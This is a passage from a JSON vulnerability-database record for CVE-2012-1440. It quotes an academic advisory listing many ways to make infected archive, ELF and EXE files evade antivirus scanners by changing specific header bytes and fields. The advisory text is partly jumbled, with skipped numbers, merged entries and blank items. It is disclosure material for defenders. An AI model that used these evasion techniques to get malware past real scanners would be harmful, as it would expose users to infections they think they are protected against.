"scope": "eq",
"trust": 0.3,
"vendor": "esafe",
"version": "7.0.170"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
}
],
"sources": [
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:norman:norman_antivirus_\\\u0026_antispyware:6.06.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_vet_antivirus:36.1.8511:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52595"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1440",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-1440",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54721",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1440",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-404",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54721",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA eTrust Vet Antivirus 36.1.8511, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified identsize field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. CVE May be split intoChanged by a third party identsize Have fields ELF Via files, malware detection can be bypassed. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n evades detection. \n\n Affected products -\n ClamAV 0.96.4, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n evades detection. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n Symantec 20101.3.0.103\n\n CVE no - \n CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n evades detection. \n\n Affected products -\n Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n CVE no - \n CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n evades detection. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n PCTools 7.0.3.5, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n 4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n 3 bytes evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n offset 29 evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n evades detection. \n \n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1428\n\n11. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n CVE no - \n CVE-2012-1429\n12. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1430\n13. \n\n Affected products -\n BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n 29 evades detection. \n\n Affected products -\n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n 6 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n 8 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n Panda 10.0.2.7\n \n CVE no - \n CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n offset 30 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n offset 2 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n offset 526 evades detection. \n \n Affected products - \n Comodo 7425\n \n CVE no - \n CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n offset 257 evades detection. \n\n Affected products - \n Comodo 7425, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1438\n\n21. \u0027padding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s padding field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1439\n\n22. \u0027identsize\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s identsize field is incremented by 1 it evades\n detection. \u0027e_ip\u0027 and \u0027e_res\u0027 field in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n Prevx 3.0\n\n \u0027e_minalloc\u0027, \u0027e_res2\u0027,\u0027e_cparhdr\u0027, \u0027e_crlc\u0027, \u0027e_lfarlc\u0027,\u0027e_maxalloc\u0027,\n \u0027e_oeminfo\u0027, \u0027e_ovno\u0027, \u0027e_cs\u0027, \u0027e_csum\u0027,\u0027e_sp\u0027, \u0027e_ss\u0027, \u0027e_cblp\u0027 and \n \u0027e_oemid\u0027 fields in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0\n\n\n CVE no - \n CVE-2012-1441\n\n24. \u0027class\u0027 field in ELF files is parsed incorrectly. \n\n Affected products - \n CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to \u0027MZ\u0027 can be fixed by the \n user and correctly extracted. Such a file evades detection. \n \n Affected products -\n ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n Avast5 5.0.677.0, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1443\n\n26. \u0027abiversion\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abiversion field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1444\n\n27. \u0027abi\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abi field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1445\n\n28. \u0027encoding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s encoding field is incremented by 1 it evades\n detection. \u0027e_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s e_version field is incremented by 1 it evades\n detection. \n\n Affected products -\n Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1447\n\n30. \u0027cbCabinet\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s cbCabinet field is incremented by 1 it evades\n detection. \n\n Affected products -\n CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n CVE no - \n CVE-2012-1448\n\n31. \u0027vMajor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s vMajor field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1449\n\n32. \u0027reserved3\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1450\n\n33. \u0027reserved2\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved2 field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1451\n\n34. \u0027reserved1\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1452\n\n35. \u0027coffFiles\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s coffFiles field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1453\n\n36. \u0027ei_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1454\n\n37. \u0027vMinor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n of a clean TAR archive and a virus-infected ZIP archive, is parsed \n incorrectly and evades detection. If the length field in the header of a file with test EICAR virus\n included into a TAR archive is set to be greater than the archive\u0027s total \n length (1,000,000+original length in our experiments), the antivirus \n declares the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n scripts, and images compressed using the LZX algorithm. \n For faster random accesses, the algorithm is reset at intervals\n instead of compressing the entire file as a single stream. The\n length of each interval is specified in the LZXC header. \n\n If an infected CHM file\u0027s header modified so that the reset interval\n is lower than in the original file, the antivirus declares the file\n to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n the infected content located before the tampered header. \n\n Affected products -\n ClamAV 0.96.4, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n by a simple checksum. Every header also contains a file length field, which\n is used by the extractor to locate the next header in the archive. \n\n If a TAR archive contains two files: the first one is clean, while\n the second is infected with test EICAR virus - and it is modified such that \n the length field in the header of the first, clean file to point into the \n middle of the header of the second, infected file. The antivirus declares \n the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, \n Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, \n CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, \n Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, \n Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, \n PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, \n Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, \n VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1459\n\n42. If an infected tar.gz archive is appended 6 random bytes at the end, \n the antivirus declares the file to be clean but virus gets extracted by\n the gunzip+tar programs correctly by ignoring these bytes. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n \n CVE no - \n CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n when the contents are extracted. If an infected .tar.gz file is broken \n into two streams, the antivirus declares the infected .tar.gz file to \n be clean while tar+gunzip extract the virus correctly\n\n Affected products -\n AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n beginning, the antivirus declares the file to be clean but virus gets extracted\n by the unzip program correctly by skipping these bytes\n\n Affected products -\n AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n Symantec 20101.3.0.103 \n\n CVE no - \n CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n for little-endian, 02 for bigendian. Linux kernel, however, does not\n check this field before loading an ELF file. If an infected ELF file\u0027s 5-th \n byte is set to 02, the antivirus declares the file to be clean but the ELF \n file gets executed correctly. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n CVE no - \n CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "PACKETSTORM",
"id": "110990"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1440",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "BID",
"id": "52595",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-54721",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110990",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"id": "VAR-201203-0400",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:10:08.649000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/jp/default.aspx"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/antivirus.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.norman.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "eSafe",
"trust": 0.8,
"url": "http://www.aladdin.co.jp/esafe/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1440"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1440"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.safenet-inc.com/data-protection/content-security-esafe/"
},
{
"trust": 0.3,
"url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1439"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1429"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1432"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1428"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1446"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1443"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1441"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1430"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1431"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1423"
},
{
"trust": 0.1,
"url": "http://www.ieee-security.org/tc/sp2012/"
},
{
"trust": 0.1,
